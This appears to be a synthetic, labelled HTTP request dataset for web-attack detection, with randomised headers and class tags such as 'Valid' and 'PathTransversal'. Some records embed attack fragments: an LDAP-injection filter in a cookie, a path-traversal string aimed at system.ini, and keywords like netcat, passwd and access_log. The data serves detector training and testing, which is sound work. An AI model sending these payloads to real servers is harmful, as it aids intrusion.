Content-Language: nievi,0,Httg
Content-Encoding: gzip
Content-Location: http://adsmoege.it/ndtr.pdf
Content-MD5: cmVlNWVpZG9sc2VldGs1NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 May 09 17:58:13 CET
Host: 24.4.102.91
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-15;q=0.3, iso-8859-9, iso-8859-2;q=0.6, iso-8859-8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 58.102.173.136
Cookie: 9wideshsy=) (    |  (cn=*o  'brien*)(mail    =*o   'brien*   )   ;s0p=645837;Miap=6974834
Date: Tue, 12 Jan 10 07:07:19 UTC
ETag: "w0b9ghnA4RJ3qFmdT"
If-Match: *
If-None-Match: *
Max-Forwards: 4
Authorization: 9umrcd snhO=shrdA
Range: 18-
Referer: /Resn.cfm
User-Agent: Mozilla/3.8 (Machintosh; U; Mac OS X 0.8; su-nn; rv:5.2.4) Gecko/89823016
UA-Pixels: 6666x3382
Transfer-Encoding: xdin
Upgrade: utraU/8.6, 07oswn/3.9, thkodf/2.0, 1lpi/5.9
X-Forwarded-For: 172.141.49.245
X-Serial-Number: 7713796518082043

ure7Arlosnkpwh2=uubhg%ia&ntgO=et4iSxrsweiogrjmPA&nmc7hgidsn1q=1007403&dopte=nph-:Dmochaob t&hblbc1dorder=f\tg

End - Id: 39120
Start - Id: 681
class: Valid
GET /dx6o4Nzsi6vczu/1od/ezRZKGPlX3dj_SS/xboot.iniW/ef3r8cjiiaadnnw/wEroooha9/nrBs2sdij0zDj/wOG/airaw2e1n3o9yn.png?Zlti=dsa&QLyns=ometaeIq+d&sfy8agaeeeboc=8481301&nSrwmlifr1=9perlgGa%29atTphiu+&oxjvYMemfi=79 HTTP/1.1
Host: 109.79.233.67
Connection: close
Accept: audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: lhnohe-86a, yttanest-shmat;q=0.7
Cache-Control: max-age=99075
Client-ip: 252.40.210.190
Cookie: eutee=071806536;m5noouhrns2=-e;N5wgetw=h8EQ
Cookie2: $Version="173"
Date: Sat, 11 Aug 07 07:02:38 CET
ETag: W/"AyTAAgzIIcyRiZXpiP"
Expect: 100-continue
From: Hhhc@wc2ahhr.st
If-Modified-Since: Mon, 15 May 06 15:14:40 CET
If-Unmodified-Since: Wed, 24 Sep 08 09:24:20 GMT
If-Match: "GEEpbebkfULA6.pHJ"
If-None-Match: "ks9n4IvewJl21gyCOVG6"
If-Range: Sun, 15 Apr 07 22:06:12 GMT
Max-Forwards: 4645
MIME-Version: 5.4
Pragma: 1hsn=e3Gperto
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: Basic anhpTUM6bmFzaA==
Range: -7,9185-99305,64-211014
Referer: http://zyasa.st/8vbe8iw/Aeop/hv4iowXd/yw6lcpaa.tar.gz
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 2.0; ie-dO; rv:6.4.1) Gecko/44712216
UA-CPU: x86
UA-Disp: 667,0755,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 312x096
Via: 0.6 194.153.1.101:968, 8.4 150.247.245.238, 2.2 218.107.130.243:64
Transfer-Encoding: deflate
Upgrade: pneie/9.5
Warning: 837 www.zclksu.html:88406 "Zpdsjhaenioecr" 
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 40090704001637847095
----: --------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 681
Start - Id: 25126
class: Valid
GET /niAr9tiFsPI6pOr/reeei31ewi/pbWh/tvu4/7oHcBQ/QH/olZas5dtdntBpr.png?uaIehz=Ponand&se66d09kt1=out%3Du&lawoTtoac9fomel=pt%28&ys6yl=likeqC%3Deot&iaOal5i1s=t756%40K4Zxiec&bagOdnuehttea=hCeP&eieAdscane=363&5e=sNPL HTTP/1.0
Host: 42.249.244.132
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.9
Accept-Language: *;q=0.6
Cache-Control: itoetnut='ceiawi'
Client-ip: 67.105.118.24
Cookie: eeaelo=75601400;S5wshpe14aRrmI=27792723
Cookie2: $Version="0"
Date: Thu, 01 Jun 06 12:52:54 GMT
ETag: W/"OdqQGT-K5rFaplwUgeJ"
Expect: 100-continue
From: hdmeewo@EiLnsiO.uk
If-Modified-Since: Mon, 16 Oct 06 14:31:11 GMT
If-Unmodified-Since: Wed, 23 Jun 04 23:57:39 UTC
If-Match: *
If-None-Match: "odpGV.vdk.nPrHtUp82"
If-Range: *
Max-Forwards: 28
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Basic dW1pdDplbGR6dGFzYg==
Range: -47756
Referer: /mfn3fx/ehInl/nwsch7.gif
TE: chunked,trailers,trailers
Trailer: Accept-Encoding
User-Agent: h9tejoihixeo
UA-CPU: PowerPC
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5457x802
Via: 2.1 148.106.23.42, HTTP/1.6 38.92.167.248
Transfer-Encoding: nL2ra
Upgrade: rle/3.1, oaatl/1.5, seeNg/9.4, nHrat/7.6, tsarti/6.4
Warning: 856 www.otgia.css "oabfnoRfoehnueGi" "Tue, 04 May 10 20:01:11 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 29602891533247777
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25126
Start - Id: 10892
class: Valid
GET /eaH/eR/lQFNVFrgyrCIsGhJ.@/ed0sENfU-@cEN4Y1/nc8pFRne/oA19e1snoiatsrrhe/e7b/y@MEftpdeletelMKnullEb/oNf6bh1pb_dwd/%u0/0stOnide/crlpplHieft1oc.shtml?njoae5y1gne4bh=ovi5easoy&m72=6&8autoexecinputai.v@0rjT=sowsn&i4nAnc64wIQ4K=ewt7eNise&Io58Flp.QgU=9&Ugatornns=edGMMDJOYe&rrN5shtuLeoi9i7=94638&nan6eh=eiyofaretsf HTTP/1.1
Host: 19.144.180.206:80
Connection: lsEh
Accept: */*;q=0.4
Accept-Charset: koi8, cp-932;q=0.7, utf-8;q=0.9, windows-874;q=0.0, utf-7;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: i-sG24iat, aetjh-Ceawfe, zeltne-as, Wse86r-n, mpGih9E1-rrY
Cache-Control: min-fresh=965
Client-ip: 154.30.238.254
Cookie: igoshuj911dsu=3685;likeLDbRP=12973
Cookie2: $Version="5"
Date: Sat, 12 Dec 09 20:10:24 UTC
ETag: W/"Fsh_ea7Vz36LAAN"
Expect: 100-continue
From: 9Ytl@niohHlSiyq.uk
If-Modified-Since: Thu, 24 Mar 05 04:01:20 CET
If-Unmodified-Since: Mon, 26 Apr 10 04:25:50 CET
If-Match: *
If-None-Match: *
If-Range: "XS38y4DAQ7cxZ5l@YNz"
Max-Forwards: 6844
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: 1xtIss Nhem=leul
Range: 7-
Referer: /bxltaefG/Dssnoahf/utLoche/ESzoafat/typr.swf
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 0.5; Rs-5t; rv:3.3.8) Gecko/41933892
UA-CPU: MIPS
UA-Disp: 8078,065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 488x175
Via: FTP/3.2 www.8ioc5.jpg, FTP/1.0 www.to5ts.gif, FTP/1.6 97.148.239.98
Transfer-Encoding: compress
Upgrade: zitfn/8.6, ijcqg/4.3
Warning: 613 www.Aryigoac.js "2cEetAr" 
X-Forwarded-For: 100.116.0.127
X-Serial-Number: 70193457062638076597
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10892
Start - Id: 7010
class: Valid
PUT /Mei/s0enalhtFldeaenq/sznoad7taixap/tqsedT/h9ronFatdb/Vlikez83z.exe? HTTP/1.1
Content-Length: 24
Content-Language: i4,r0o
Content-Encoding: deflate
Content-Location: http://www.iw9g.net/seyuezo/tadaE.rar
Content-MD5: NmVkbnNsZWtLazJsaGVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Feb 06 14:32:40 UTC
Last-Modified: Mon, 10 Oct 05 23:29:22 UTC
Host: www.ioRa.ch
Connection: close
Accept: */*
Accept-Charset: utf-7, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=34591
Client-ip: 226.93.8.242
Cookie: sqa=956;48from-G= nhs;no=nna;udusr@e9xlAr8=msf+
Cookie2: $Version="6"
Date: Fri, 14 Aug 09 06:52:02 CET
ETag: "7CfSOWX-WuxMsP_N"
Expect: 100-continue
From: 3aelr@ah0pebewsn.st
If-Modified-Since: Fri, 29 Aug 08 14:54:56 CET
If-Unmodified-Since: Fri, 03 Mar 06 07:32:42 UTC
If-Match: *
If-None-Match: "YVe58JFdhuU-XAB"
If-Range: *
Max-Forwards: 859
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM dWJubHNhV2V3dGluZWRyYmFYenFxZWdZZWNpZDMxYUZyb2Rqbg==
Authorization: Basic bjFpbjpkMTV0ZVRN
Range: 594453-,90-83016,710615-38453
Referer: http://e1maseme.de/nldnte.pdf
TE: deflate,trailers
Trailer: Cache-Control
User-Agent: nOJlIg http://www.ca8hl4.net
UA-CPU: 68000
UA-Disp: 5230,785,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 443x583
Via: 1.9 www.aAeti4.htm, 6.1 77.194.93.124, HTTP/4.0 245.240.138.153
Transfer-Encoding: deflate
Upgrade: duhc1d/2.7, efNnL/5.9, iitden/5.4
Warning: 589 www.nhhyogma.shtml "fHhMnnwmhsiuhee63ct" "Tue, 29 May 07 19:39:21 UTC"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lyl=n&ogtzecvresif=ds8bA

End - Id: 7010
Start - Id: 2062
class: Valid
GET /8FnWNmqfMJc/Y7y0akZPj7.pl?PktrstntheeEs=%3A&XincludeH2cmdB=72056047&slfroledas=135&Ees=yl&ps=messunxnO1bAeste&ROaUT=5239071&ovu1E=mtpmocha+%5C%3F%25u4xQdea&raaI8enhu2wzq=0381308&asyhe=formeo&lor4enjnAnaowl=o&eantti=0SeGiEo.L5&Lera=496629 HTTP/1.0
Host: www.qe4eo5do.be
Connection: close
Accept: image/*;q=0.8, audio/basic
Accept-Charset: iso-8859-8-i, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: 8-bnrurhoa, dcol-Rrs;q=0.7
Cache-Control: t=mori
Client-ip: 243.4.248.171
Cookie: esldO0msW=dGc
Cookie2: $Version="2"
Date: Mon, 28 Jul 08 22:23:17 GMT
ETag: "CqKJhzj3js0ETbABe"
Expect: eteeotl
From: wDshh4eU@hl5stetee.com
If-Modified-Since: Fri, 28 Mar 08 14:15:11 GMT
If-Unmodified-Since: Wed, 12 Apr 06 13:49:03 GMT
If-Match: "eLOhbSt9teIsT7m@BcL"
If-None-Match: *
If-Range: Mon, 28 Dec 09 23:24:09 CET
Max-Forwards: 34
MIME-Version: 1.2
Pragma: tmrcncsw=eUo0
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Basic dHd0ZXJhOmVsdVV0cGY=
Range: -586766,7072-,732551-
Referer: http://www.auuf.st/ntxIi/7paY4or.gif
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: ae0me (a62O@Oz)
UA-CPU: StrongARM
UA-Disp: 0185,510,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 008x3318
Via: FTP/4.3 181.219.253.205:26980
Transfer-Encoding: compress
Upgrade: wleh/1.8
Warning: 344 www.BJasytN.css "r0la5" 
X-Forwarded-For: 242.10.119.24
X-Serial-Number: 82872435333808
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2062
Start - Id: 45394
class: PathTransversal
PUT /ytelnetSkxuRrdocuments0/bq9Y.ZZOisHAMqlH@R.shtml? HTTP/1.0
Content-Length: 186
Content-Language: o0s7,ta,hv
Content-Encoding: identity
Content-Location: /6nm0Ee6/eushhkgr.jpg
Content-MD5: a2FpMzRucm1vbGh5bmF6dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Mar 05 12:15:43 UTC
Last-Modified: Wed, 02 Jul 08 13:04:00 UTC
Host: 154.8.127.25
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale=16324
Client-ip: 2.231.241.65
Cookie: ielhb2smaem3re6=utJmjseNaw;idscf=aBCWybpX
Cookie2: $Version="7"
Date: Mon, 05 Apr 10 21:15:31 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sun, 19 Dec 04 08:01:02 CET
If-Unmodified-Since: Sat, 19 Apr 08 19:39:26 UTC
If-Match: "0G3hCafjr.2N4XFsY5c2"
If-None-Match: *
If-Range: Tue, 02 Feb 10 05:14:04 UTC
Max-Forwards: 013
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: gclbs enS5me=dcjupRxa
Authorization: Basic b3VjYTE6ZmQ1YXQ=
Range: 4-825,07-,961817-416
Referer: /graive/nRcvrht/cneep.zip
TE: trailers,deflate,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: tilie1
UA-CPU: Sparc
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 789x027
Via: Ebmrhn/7.5 www.oshnenl.css, 1.5 www.tUejt.html
Transfer-Encoding: epWl
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 734 www.Ibioal.css "rqcaasnnairnvta5it" "Mon, 07 Jun 04 08:13:32 UTC"
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bi1ith8a=ewetE4iweegrced&rhite=1h1too5op&1mail_cwMcmdJC=968921&j9lEieiehcue=isxp_t(&Lltoiycs0d=..........................WINNTsystem.ini&rdto=75474777&udkdyltu3ohj2ba=1&aEh7ahha=342676

End - Id: 45394
Start - Id: 15043
class: Valid
GET /dd92zasR9nrtbKMSZm/n0TxSi/autoexecEi.sKW/l0QSqoniF52dh-Z/la.css?jQall8YxkHy3N=ilRuTy%404-a7w&eelncig9ah=ie&hsahmc=t2j0gcU&AyU.iZghNZZ=aKlmty&7et2sthal=uhrtsaiscx&FcO5K@bexec4ziX=odeashpttvl%7Eiiu&cci4=qs&vc-@9h9OdHx=mzcBE HTTP/1.1
Host: 19.94.61.67
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.7
Accept-Language: rnara-soh, tigiSw-t, oas3ea-uma
Cache-Control: no-store
Client-ip: 111.79.206.174
Cookie: @FAuPv=0;HwhS3h= pfc;KN3E=97;gvSJpassthrufEZYbody=1iire;K76phavingiJ=e_6zBXqFXrc;jmlerihwurdlCeh=3945
Cookie2: $Version="713"
Date: Mon, 12 Oct 09 12:09:14 CET
ETag: W/"Kgp7SfO5X-ixZ73jpyD."
Expect: Mebaktss
From: NBko@ilcocf4eu.ch
If-Modified-Since: Mon, 16 Jan 06 19:20:39 GMT
If-Unmodified-Since: Mon, 24 Dec 07 13:43:50 UTC
If-Match: "QbfMrxPhO7H0Na9"
If-None-Match: *
If-Range: "QhCi8LHL03eP1ew"
Max-Forwards: 116
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest username="ttnditw"
Authorization: Basic c29zdG50YXQ6ZW9pbg==
Range: 4-,-3,94-
Referer: /ipctloh.jpeg
TE: chunked,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: tFljlyd http://www.imaccD.cz
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7618x6392
Via: FTP/4.2 235.245.101.131
Transfer-Encoding: gzip
Upgrade: 7pnrhe/1.7, tyytsb/2.7, rnTs/2.9, cgit/1.6, tek/9.5
Warning: 670 120.59.241.81 "srredysdrtssiTT" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 958943826904140
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15043
Start - Id: 20881
class: Valid
GET /NEorcn/nJsCOZjO2gEhPLEO6za0/gSKOVHjwz.mdb? HTTP/1.0
Host: 188.107.179.212
Connection: uekEd
Accept: */*
Accept-Charset: koi8-r;q=0.7, euc-kr, iso-8859-5, x-mac-arabic;q=0.6
Accept-Encoding: compress, identity;q=0.8, compress;q=0.3, deflate;q=0.3, gzip
Accept-Language: nhocaije-f, embijnao-c, epeir-emteo;q=0.5, aro-riJ9rn
Cache-Control: max-age=31
Client-ip: 109.100.247.82
Cookie: hf=?haccess_log s0>Ee;acmllrnwvYl=Fuvl;tbza2=8995;F.VlocationA=etet0sock_stream2r;dD;anbstNiwuOca4r=Ox2~e;noo=0102984
Cookie2: $Version="19"
Date: Wed, 30 Mar 05 15:05:46 CET
ETag: W/"w2kRn@NKQUz0.cL"
Expect: ef4mTus
From: eot6xm@geemirrlzt.biz
If-Modified-Since: Sun, 03 Oct 04 06:43:28 GMT
If-Unmodified-Since: Sat, 24 Nov 07 04:42:59 CET
If-Match: "qQM5.iAMVdUAVYH"
If-None-Match: *
If-Range: Thu, 14 Oct 04 05:14:31 UTC
Max-Forwards: 0
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RHJpZGJ5YTk6OFhpdHJlYg==
Authorization: NTLM cm9saWlkbGx0SW5yZmVzVG90ajlvdDNtYWlzcmFucDJ0Z2V0bnQ2
Range: 90-96,-579803,-6
Referer: /chir/t6aa.rar
TE: chunked;q=0.8,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: zdldnhies (tdGUWqY1g; e5kq@7Zb; 1hU1O0Q; 21vBtEic29)
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0585x0395
Via: ilibtc/8.5 www.tm2oOoy.jpeg
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 183.219.223.187
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20881
Start - Id: 7
class: Valid
GET /Soqdee/lDF.jpg?ep=etct&n7etNmaarail=Oq+%7Eea3ml&osctncci=hu%29met%7Els&8ras=8026&mEiohsEar=i%40%40yDd&s4SPt3utmpD=ih%24ioraaanb&Bceah8ttx8xe18r=s1&bCry1=at+&HohsefelieueMdu=+ite&tyyZwcatiIP=-h&reehiisJm=4anj%2BqoT&4VdE=iJ3DB%40AB&moteeagse3=neeomcteSouRNh&L3wF=+lEou&thrcahhlTse8=xmlE HTTP/1.0
Host: www.Ciowsdti.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-1;q=0.4, iso-8859-9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: max-age=56191
Client-ip: 198.201.173.41
Cookie: oarraatavd=tisrP3n5mopsy;C.psdnB=87378
Cookie2: $Version="382"
Date: Mon, 15 Mar 04 14:00:38 CET
ETag: W/"8iZ39RWZewgvp0wTVy"
Expect: 100-continue
From: 4atoe@ehNulvLa.net
If-Modified-Since: Thu, 08 Jul 04 03:25:10 GMT
If-Unmodified-Since: Wed, 29 Nov 06 01:48:48 CET
If-Match: "zv_rZaStdUmXCxRi0SvS"
If-None-Match: *
If-Range: *
Max-Forwards: 256
Pragma: vthu=ifdlS4il
Authorization: Basic aW9lbndlb2U6ZUVsc2Nu
Range: -8,-6
Referer: http://www.onAivi.com/u2d4/lhna.dll
TE: gzip;q=0.1,trailers,trailers
Trailer: Host
User-Agent: st3ithi4 (hW_zrI; sHjAdU; lVew1S; tft6Dn7)
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color8
Via: HTTP/8.5 38.114.179.225
Transfer-Encoding: compress
Warning: 092 www.bnp6yotc.jpg "It5ru0hZb2OxuMoerlh" "Fri, 11 Dec 09 19:58:51 GMT"
X-Forwarded-For: 20.155.227.227
X-Serial-Number: 157557837076027

null

End - Id: 7
Start - Id: 8718
class: Valid
GET /iMOIokvw8md3QPp2u4qj/shutesdaei/7x/aH/nrt03aad/tBBr8faiVsWVoNFasH8H/hsiXk/eV1WrPadO3ox/.fUcuZ2vnetcat.jpg?Ieiduelhdl=ac HTTP/1.1
Host: 56.129.131.32:9
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 14.53.34.50
Cookie: tslsrc9su=923122937
Cookie2: $Version="1"
Date: Tue, 26 Dec 06 13:10:49 CET
ETag: W/"y0VZon7C5tqGBFr_XFT"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Sun, 29 Mar 09 24:05:18 CET
If-Unmodified-Since: Sat, 16 Jan 10 23:33:25 CET
If-Match: *
If-None-Match: "F_eAAGaVjV3kz@Loq0yF"
If-Range: Tue, 15 Jun 04 18:19:37 CET
Max-Forwards: 23
MIME-Version: 9.4
Pragma: n=ea
Proxy-Authorization: as9ct dmdsne=vmoz7nhe
Authorization: Digest algorithm=hEsssZ
Range: -1251,-8,78356-
Referer: http://www.t8rhe.st/aien310/ertgowto/tkeSx6/atENpiht/nrthaeo.swf
TE: deflate;q=0.2,trailers,gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/7.7 (compatible; Konqueror/8.4; Open BSD i586; o5ei; eiutkt; eoicam)
UA-CPU: PowerPC
UA-Disp: 232,8608,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 559x025
Via: 1.2 183.154.39.41:9522, FTP/9.6 5.48.116.160
Transfer-Encoding: gRhefv
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 722 191.87.245.62 "ldhaa3etlrseAcnvoe3a" "Fri, 03 Dec 04 20:48:39 CET"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 23222
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8718
Start - Id: 4491
class: Valid
POST /eMEidbFqaax/R_amit/latfrhhavercisucet/ZJZjPwb_/3yMnay7bdawfHeera/hwZZxIA1tAD/.MELZoNNxa@mY0d/rN_oLnTprN/fAiROoEgaE/n7htK_w5Vnoc/uttns.asp? HTTP/1.1
Content-Length: 13
Content-Language: cedytrgs,rcBnati,n
Content-Encoding: gzip
Content-Location: /apbW/tnweltet/ehSecCos/thii8e.swf
Content-MD5: d1dpcmp6ZW5hbHJlMGZ0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Mar 10 22:38:23 CET
Last-Modified: Mon, 12 Jan 09 18:37:09 UTC
Host: www.e8es.net
Connection: close
Accept: image/*
Accept-Charset: iso-8859-1;q=0.3, iso-8859-8;q=0.0, windows-1250;q=0.9, iso-8859-4
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: min-fresh=02483
Client-ip: 48.17.250.189
Cookie: 7PhAonsooqeW=sb1S;8hf=2003327;yonsa=Ezn9tlalib;tcln2ndceestflr=1114
Cookie2: $Version="159"
Date: Sun, 28 Mar 04 10:45:22 CET
ETag: "YaR8h4..MtPzo2V68"
Expect: St1qor
From: bf9teahb@eaaAl.be
If-Modified-Since: Wed, 19 Nov 08 02:39:45 CET
If-Unmodified-Since: Mon, 26 Apr 10 22:19:13 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Apr 08 16:54:55 UTC
Max-Forwards: 866
MIME-Version: 8.4
Pragma: 1a=oeQy
Proxy-Authorization: Digest username="dorrt"
Authorization: Basic ZXRybnNjaWE6bm01cw==
Range: 58-081,-238
Referer: http://godoiai.cz/s74Tli6l/Eicn/mntg/yIsarrsi.asmx
TE: trailers
Trailer: Accept
User-Agent: Mozilla/0.2 (X11; U; Open BSD i386 5.5; ct-1e; rv:6.3.2) Gecko/32107801
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1131x282
Via: FTP/2.7 94.160.234.166, 1.1 210.245.118.240
Transfer-Encoding: identity
Upgrade: Nh5/1.2, 4illg/1.5, plnv0/0.1, dsEn4/3.7
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ar=@vteM1el

End - Id: 4491
Start - Id: 4701
class: Valid
POST /soWeYkka-ZyJ/wlwumw/nhC.php? HTTP/1.1
Content-Length: 128
Content-Language: 4Odaeezt
Content-Encoding: compress
Content-Location: http://leedo.net/h4teNhae/1Sheg/noiue.bin
Content-MD5: aHNlbG5zNmFjdGRseW1lUw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Feb 06 23:15:40 CET
Last-Modified: Sat, 09 Sep 06 24:43:25 CET
Host: www.eEKulCan.de
Connection: close
Accept: audio/x-wav
Accept-Charset: big5, iso-10646-ucs-2;q=0.8, iso-8859-8-i;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: mZtty-nerw;q=0.7, gas-WnehesDI;q=0.4, 75femutd-n
Cache-Control: teih='sZix'
Client-ip: 112.42.189.63
Cookie: tetmte3eiy5on=1660;Hpjqyayo=:ZphE
Cookie2: $Version="3"
Date: Sat, 23 Oct 04 24:46:34 CET
ETag: "N4x7YAzUzl017z4-GAG"
Expect: sr4rhyR
From: sioaA@hwxrt2des.de
If-Modified-Since: Fri, 28 Mar 08 04:07:36 CET
If-Unmodified-Since: Sat, 27 May 06 01:06:31 UTC
If-Match: "vKlHkH8@eZ9Y9gsOf"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: tegTm hefxihhy=neebRy
Authorization: Basic bDJVZWhpcmw6QUF0b2lJ
Range: 19347-31772
Referer: http://osscrl.gov/humstaok/nssocb/olIah9.php3
TE: gzip;q=0.2
Trailer: TE
User-Agent: Mozilla/2.6 (Windows; U; Win98 6.4; ii-al; rv:9.5.6) Gecko/48485507
UA-CPU: Sparc
UA-Disp: 6565,867,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5828x404
Via: FTP/0.8 237.77.128.173, 3.8 101.115.114.197
Transfer-Encoding: gzip
Upgrade: ysyAt/4.9, ygi/4.5
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 7064838
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eaRtyeey9=li&2ri7=thlogr&n8tbratss=t9nte%yoela:p:awba&gexntn7Efd=it@+f&eiqiuschmwn=e yi=&EayrdkR=[iwsacceptnetcatR

End - Id: 4701
Start - Id: 26195
class: Valid
GET /_NXMsoW5f0apasswdinclude5o7/oeaRWH_mZP1brXLXCwsj/epd/1o/sSNE0d0eHzlyk-ZSr39/xnc/kbuvqpwcS63Q.png?deeessp4uoFd5=58&Ssm21=aaccess_log&RtSv=+tr%24aehttpe&hs=tel%2BrtoeOtth&itnhhn7ens=nr++po%28hscehk%2B%28%3Cao&tdomtifonko=aE0evdac&7dabu=loieae2Cfnr&gtasstemtsuAzz3=4392&FvyT=tt9netHbsadqg&p1l=eeea&LohatAdeIE=3&b0KQgG-gexecbI2=97206271&teyuooyome2s=nlfd HTTP/1.1
Host: www.omamnr.biz:80
Connection: ha1c4
Accept: application/x-tar, video/*;q=0.2, audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 200.48.13.171
Cookie: NroAihctgtlesw=3078;ARn8la52t=8282368;nceDgxeosthnn=cctwoxhsi=4tih;anT7dsotsti1ir=da% ;LpositionCiUOechoQLq.8=55500217
Cookie2: $Version="79"
Date: Mon, 16 May 05 16:57:06 GMT
ETag: "JcbwuqTF96ZmBk@TmAG"
Expect: 100-continue
From: cEtjyn@dlz1.gov
If-Modified-Since: Sat, 06 Aug 05 01:58:37 UTC
If-Unmodified-Since: Sun, 18 Apr 10 24:27:24 CET
If-Match: "m.msVYfBu@ydaZKL."
If-None-Match: "YjO0R_CT1B2rMXNMni"
If-Range: Wed, 18 Jan 06 15:20:22 GMT
Max-Forwards: 262
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: NTLM aHdlcjlvb21obXFsYm9FaG55dEU3ZWNydGFhbGJlbjFleWQ=
Range: 863391-,79-36
Referer: http://www.kahir.net/ytsniv/aTentmeu/dtch/obdaoune.pdf
TE: gzip;q=0.5
Trailer: User-Agent
User-Agent: anhsy7Eg (rASR5mNv; cL5SOnv; ulwCJ2; vy4rjevb9v; 1Ed0KT)
UA-CPU: MIPS
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
